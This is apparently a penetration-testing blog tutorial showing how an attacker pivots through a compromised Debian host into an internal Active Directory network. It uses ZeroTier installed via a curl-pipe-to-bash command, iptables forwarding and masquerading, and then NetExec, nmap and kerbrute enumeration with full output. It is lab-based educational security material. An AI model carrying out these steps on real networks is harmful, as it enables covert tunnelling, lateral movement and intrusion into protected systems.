Axis Shift: Pivoting using ZeroTier

Pivoting is a specific process in post-exploitation in which an attacker expands his presence in the network. This article is about pivoting using ZeroTier.

Axis Shift: Pivoting using ZeroTier

Pivoting is a specific process in post-exploitation in which an attacker expands his presence in the network. This article is about pivoting using ZeroTier.

Caster - Axis Shift

Genre: Offensive
Label: exploit.org
Release Date: 04.09.2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)

Intro

Pivoting (from the word pivot) - is a phenomenon in which a specific post-exploitation process occurs in which the attacker expands his presence in the network. The attacker during this phase bypasses network isolation, FW, NAT, and other network interferences. There is no such thing as which pivoting method is best, it is a case-by-case basis. In the context of this article we will talk about ZeroTier.

Disclaimer

This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.

Disruption of systems, hacking into other people's computer networks will be prosecuted. Be careful and do not try your luck.

What is ZeroTier?

ZeroTier - is a software that allows you to create Virtual Private Networks (VPNs) on top of your existing Internet infrastructure. It is essentially a solution for connecting different devices and networks into a single virtual network, regardless of their physical location. ZeroTier's main advantage is its simplicity and flexibility in configuration, as well as its ability to bypass network restrictions such as NAT without the need for complex router or firewall configurations.

ZeroTier works like a virtual network, creating distributed P2P networks with minimal latency and high performance. It allows users to interconnect their devices into a single virtual space.

What's ZeroTier for?

ZeroTier is a very useful tool, it is handy for:

  1. Remote work: Create a virtual network to connect employees or clients working from different locations;
  2. Connecting disparate networks: ZeroTier allows multiple networks to be connected into a single logical network, providing connectivity between segments that cannot be physically connected;
  3. Pentesting: Bypasses network barriers and connects to secure network segments, making it an ideal tool for security professionals and pentesters;
  4. Gaming and multimedia: Create local networks to play games or share multimedia files among friends and family.

ZeroTier Plans

ZeroTier Plans

ZeroTier Features

ZeroTier has several features, among them:

  1. P2P connections: ZeroTier supports direct P2P connections between nodes, which minimizes latency and increases throughput;
  2. Flexible routing: Supports complex routing, including overlapping networks and dual-NAT networks;
  3. Cross-platform: ZeroTier runs on multiple platforms, including Windows, macOS, Linux, Android, iOS;
  4. Easy Setup: ZeroTier setup is simple and does not require deep knowledge of network engineering.

Benefits of ZeroTier

ZeroTier has the following advantages:

  1. Easy to use: ZeroTier can be set up and used even without much networking experience;
  2. Scalability: It allows you to easily scale your network by adding new nodes to your virtual network without having to reconfigure;
  3. Flexibility: It supports complex network topologies and can be used for a wide variety of applications, from simply connecting a pair of devices to creating complex enterprise networks;
  4. Free version: ZeroTier provides a free version, making it accessible to a wide range of users.

ZeroTier Disadvantages

Despite how good ZeroTier is, it also has drawbacks, including:

  1. Internet Dependency: ZeroTier requires a stable internet connection to work. Internet is not always available in pentest conditions;
  2. Management through the cloud: Although ZeroTier allows private networks to be created, they are managed through the cloud, which may raise privacy concerns in certain scenarios;
  3. Limitations of the free version: The free version has some limitations on the number of nodes in the network and functionality, which may not be sufficient for large enterprise needs;
  4. Potential delays: Despite support for P2P connections, there may be delays in data transfer when working across multiple nodes.
  5. Privileges: Using ZeroTier will require superuser privileges. This is a potential disadvantage for pentester.

ZeroTier Outro

ZeroTier in our case is a great tool for pivoting. The essence of this concept would be for an attacker to create a virtual network where they would place their machine, the compromised machine, and then through it further into the network infrastructure.

Infrastructure

For this article, I have prepared the following infrastructure. An attacker is on the Internet and has already compromised some machine inside the network, then he performed a privilege escalation and gained full control of the host. However, the compromised host has a second interface, eth1, looking towards the corporate network where the Windows machines and the domain controller are located. Ultimately, the attacker must reach the corporate infrastructure through the compromised host by creating a ZeroTier network.

Topology infrastructure for Axis Shift
Machine Operating System
Attacker Debian 12
Victim Debian 12
AD Windows Server 2022
RB7 Windows 10 Enterprise
RB8 Windows 10 Enterprise
RB9 Windows 10 Enterprise
Machine Address
Attacker 89.169.135.43
Victim (eth0) 192.168.0.40/24
Victim (eth1) 172.16.150.225/24
AD 172.16.150.222/24
RB7 172.16.150.223/24
RB8 172.16.150.221/24
RB9 172.16.150.224/24

Creating ZT Network

To create a ZeroTier network you need to create an account at zerotier.com, then after registering your account you'll be greeted with this:

ZeroTier Plans

In our case we need to select Basic. After selecting the plan, we will be greeted by the ZeroTier network management interface, it will look like this:

Control Panel

Click on “Create A Network” to create a ZeroTier virtual network. Next, a virtual network will be created with a unique name and ID. In my case the ID is 3efa5cb78aa3463e and the name is suspicious_kleinrock

Created Network

ZT Network Settings

When a ZeroTier virtual network is created, it is necessary to assign addressing to it so that each host within the ZeroTier virtual network has its own address on the interface. In my case, I decided to select the 192.168.196.0/24 range for the ZeroTier network:

ZeroTier Network Addressing

All in all, the ZeroTier virtual network is ready, now we just need to add the machine we need. Specifically, the attacker's machine and the compromised machine.

Actions of the attacker host

To run ZeroTier on Linux distributions it must be installed, this is done very simply

ssh [email protected]
caster@caster:~$ curl -s https://install.zerotier.com | sudo bash

This command will install ZeroTier on your system, you can get started. In order to add your machine to the ZeroTier virtual network you need to know the ID of your ZeroTier virtual network and connect to it, this is done using this command:

caster@caster:~$ sudo zerotier-cli join 3efa5cb78aa3463e
200 join OK
In my case, the ID of my ZeroTier virtual network is 3efa5cb78aa3463e

Once you've connected to the ZeroTier network, you'll see this in your control panel:

Host Appearance (Attacker)

The attacker host connected to the network needs to be registered on the ZeroTier network, this is accomplished by clicking this button:

Host Authorization

The attacker's machine is now on the ZeroTier network, registered and has its address from the previously configured 192.168.196.0/24 range

Also, once the attacker's machine is connected to the ZeroTier network, it will have a virtual interface with an assigned address:

caster@caster:~$ ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2800
        inet 192.168.196.58  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::3c2b:90ff:fedd:9263  prefixlen 64  scopeid 0x20<link>
        ether 3e:2b:90:dd:92:63  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13  bytes 1006 (1.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

This completes the initial configuration of the ZeroTier virtual network, now it's time to connect the previously compromised machine to the ZT network.

Actions of the victim host

Now we need to install ZeroTier on the compromised system, in our case it is a Linux distribution - Debian 12:

@compromised:~# curl -s https://install.zerotier.com | bash

Then connecting to our ZT network:

@compromized:~# zerotier-cli join 3efa5cb78aa3463e
200 join OK

After this action, the following will appear in the ZeroTier Network Control Panel:

Host Appearance (Victim)

The compromised machine must also be authorized to be a member of the ZeroTier network and have a virtual interface with an assigned address.

Host Authorization

Once the compromised host was authorized on the ZeroTier network, it had its own address and interface:

@compromised:~# ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2800
        inet 192.168.196.59  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::3c2d:27ff:fe62:e6b6  prefixlen 64  scopeid 0x20<link>
        ether 3e:2d:27:62:e6:b6  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 45  bytes 5651 (5.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
ZeroTier Host Address MAC ZeroTier Version
Attacker (6d3357253f) 192.168.196.58 3e:2b:90:dd:92:63 1.14.0
Victim (6b84e851ea) 192.168.196.59 3e:2d:27:62:e6:b6 1.14.0

Verify connectivity between the attacker and the compromised host within the ZeroTier network:

caster@caster:~$ ping 192.168.196.59
PING 192.168.196.59 (192.168.196.59) 56(84) bytes of data.
64 bytes from 192.168.196.59: icmp_seq=1 ttl=64 time=93.2 ms
64 bytes from 192.168.196.59: icmp_seq=2 ttl=64 time=87.0 ms
64 bytes from 192.168.196.59: icmp_seq=3 ttl=64 time=87.0 ms
64 bytes from 192.168.196.59: icmp_seq=4 ttl=64 time=88.9 ms
64 bytes from 192.168.196.59: icmp_seq=5 ttl=64 time=87.0 ms
64 bytes from 192.168.196.59: icmp_seq=6 ttl=64 time=88.9 ms
^C
--- 192.168.196.59 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5005ms
rtt min/avg/max/mdev = 86.966/88.663/93.202/2.206 ms

Ping between attacker and victim inside ZT network

192.168.196.59 is the address of the compromised machine

Pivoting

By examining the interfaces of the compromised system, we may notice that there is a second interface eth1 leading to some network. This may well be of interest to a pentester to further penetrate the infrastructure. Through the created and configured ZeroTier network, the attacker will gain access to the network behind eth1

@compromised:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.40  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::20c:29ff:feed:82f7  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ed:82:f7  txqueuelen 1000  (Ethernet)
        RX packets 3647  bytes 3619738 (3.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3104  bytes 358721 (350.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.150.225  netmask 255.255.255.0  broadcast 172.16.150.255
        ether 00:0c:29:ed:82:01  txqueuelen 1000  (Ethernet)
        RX packets 8  bytes 1468 (1.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27  bytes 3099 (3.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2824  bytes 173142 (169.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2824  bytes 173142 (169.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 2800
        inet 192.168.196.59  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::3c2d:27ff:fe62:e6b6  prefixlen 64  scopeid 0x20<link>
        ether 3e:2d:27:62:e6:b6  txqueuelen 1000  (Ethernet)
        RX packets 11  bytes 966 (966.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 65  bytes 8678 (8.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Victim Interfaces Address
eth0 192.168.0.40
eth1 172.16.150.225

The compromised machine will be the gateway to the 172.16.150.0/24 network, but routing must be configured for this to work:

  1. Enabling routing
  2. Firewall settings, NAT

First you need to enable packet routing, this feature is disabled by default in Linux distributions.

@compromised:~# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
This setting works only until the system reboots. To make routing work permanently, uncomment the net.ipv4.ip_forward=1 line in the /etc/sysctl.conf configuration file

Now you need to firewall rules (using iptables) so that the ZeroTier network can knock on the 172.16.150.0/24 segment:

First rule:

@compromised:~# iptables -A FORWARD -i eth1 -o ztrfyp74nu -m state --state RELATED,ESTABLISHED -j ACCEPT

What makes the first rule?

  1. -A FORWARD: Adds a rule to the FORWARD chain, which is responsible for forwarding packets between interfaces;
  2. -i eth1: Indicates that the rule applies to incoming packets on interface eth1;
  3. -o ztrfyp74nu: Indicates that the rule is applicable to outgoing packets that are sent through the ztrfyp74nu interface;
  4. -m state --state RELATED,ESTABLISHED: Indicates that the rule should apply only to packets that are related to already established connections (ESTABLISHED) or to packets that are related to existing connections (RELATED);
  5. -j ACCEPT: Indicates that packets matching this rule should be allowed.

This rule allows packets to be forwarded from interface eth1 to interface ztrfyp74nu for those connections that have already been established or are part of a previously established connection. This is important to maintain active connections between the two interfaces, such as reply packets, and to prevent them from being blocked.

Second rule

@compromised:~# iptables -A FORWARD -i ztrfyp74nu -o eth1 -j ACCEPT

What does the second rule do?

  1. -A FORWARD: Adds a rule to the FORWARD chain;
  2. -i ztrfyp74nu: Indicates that the rule applies to incoming packets on interface ztrfyp74nu;
  3. -o eth1: Indicates that the rule applies to outgoing packets that are sent over interface eth1;
  4. -j ACCEPT: Indicates that packets matching this rule should be allowed.

This rule permits forwarding of all packets from interface ztrfyp74nu to interface eth1. This rule is necessary so that packets that arrive on the ZeroTier interface can be forwarded to the physical network through the eth1 interface.

The attacker will also need a network route to the 172.16.150.0/24 network, this can be configured in the ZT control panel. The route to the network goes through a compromised machine inside the ZT:

Adding route through 192.168.196.59
192.168.196.59 - Victim's address inside the ZT network

Make sure that the necessary network route appears in the routing table on the attacker's side:

172.16.150.0    192.168.196.59  255.255.255.0   UG    5000   0        0 ztrfyp74nu

Important rule for NAT

Now we need a final rule for the firewall, and it deals with NAT:

@compromised:~# iptables -t nat -A POSTROUTING -o eth1 -s 192.168.196.0/24 -j MASQUERADE

What does this rule do?

  1. -t nat: This flag indicates that the rule should be added to the nat (Network Address Translation) table. This table is used to change the source or destination addresses of packets passing through the router;
  2. -A POSTROUTING: This flag means that the rule is added to the POSTROUTING chain. The POSTROUTING chain processes packets after they are routed, but before they leave the interface. That is, the rule is applied at the packet's exit from the system.
  3. -o eth1: This flag indicates that the rule applies only to packets that exit through the eth1 interface. If your Internet or other network connection interface is named differently, you must specify the appropriate interface instead of eth1.
  4. -s 192.168.196.0/24: This flag indicates that the rule applies only to packets originating from the 192.168.196.0/24 subnet. This is your ZeroTier subnet.
  5. -j MASQUERADE: The -j flag specifies the action to be performed on packets that satisfy the rule condition. In this case, the action is MASQUERADE, which means spoofing the source IP address of the packet to an IP address that has interface eth1.

When a packet comes from the 192.168.196.0/24 subnet and is routed through the eth1 interface, this rule spoofs its source IP address to the IP address of the eth1 interface. This technique is called masquerading and it is needed to access from the ZeroTier network directly to 172.16.150.0/24

Result

After all of the above configuration, the attacker has access to the 172.16.150.0/24 network that was behind the compromised machine on the second interface.

PoC I: NetExec

caster@caster:~$ netexec smb 172.16.150.0/24
SMB         172.16.150.222  445    AD               [*] Windows Server 2022 Build 20348 x64 (name:AD) (domain:f1.com) (signing:True) (SMBv1:False)
SMB         172.16.150.223  445    RB7              [*] Windows 10 / Server 2019 Build 19041 (name:RB7) (domain:RB7) (signing:False) (SMBv1:False)
SMB         172.16.150.224  445    RB9              [*] Windows 10 / Server 2019 Build 19041 (name:RB9) (domain:RB9) (signing:False) (SMBv1:False)
SMB         172.16.150.221  445    RB8              [*] Windows 10 / Server 2019 Build 19041 (name:RB8) (domain:RB8) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
NetExec netexec smb 172.16.150.0/24

PoC II: Services Scanning

caster@caster:~$ sudo nmap -n -sS -p 88,445,22 172.16.150.0/24 --open --min-rate=1280
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:36 UTC
Nmap scan report for 172.16.150.221
Host is up (0.090s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.222
Host is up (0.086s latency).
Not shown: 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
88/tcp  open  kerberos-sec
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.223
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.224
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 172.16.150.225
Host is up (0.086s latency).
Not shown: 2 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

PoC III: Kerberos Attacks (Enumeration)

caster@caster:~$ ./kerbrute userenum --dc ad.f1.com -d f1.com kerusernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/03/24 - Ronnie Flathers @ropnop

2024/09/03 23:56:03 >  Using KDC(s):
2024/09/03 23:56:03 >   ad.f1.com:88

2024/09/03 23:56:03 >  [+] VALID USERNAME:       [email protected]
2024/09/03 23:56:03 >  [+] VALID USERNAME:       [email protected]
2024/09/03 23:56:03 >  [+] VALID USERNAME:       [email protected]
2024/09/03 23:56:03 >  Done! Tested 4 usernames (3 valid) in 0.271 seconds
Kerbrute ./kerbrute userenum --dc ad.f1.com -d f1.com kerusernames.txt

Now the attacker can further interact with this subnet, look for vulnerabilities, and continue his offensive actions. This is how this pivoting method works.

But it should be taken into account that the attacker is behind NAT because of the peculiarities of network settings (NAT) on the compromised machine.

Outro

In this article, I looked at the process of pivoting using ZeroTier, a powerful tool that can greatly enhance an attacker's post-exploitation capabilities. ZeroTier makes it easy to bypass network isolation and penetrate protected network segments while providing flexibility and ease of customization.

I hope this material has been helpful in understanding the capabilities of ZeroTier in the context of pentesting. Proper use of such tools can help security professionals find and remediate vulnerabilities, thereby improving the overall security of corporate networks.

Subscribe to exploit.org

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]
Subscribe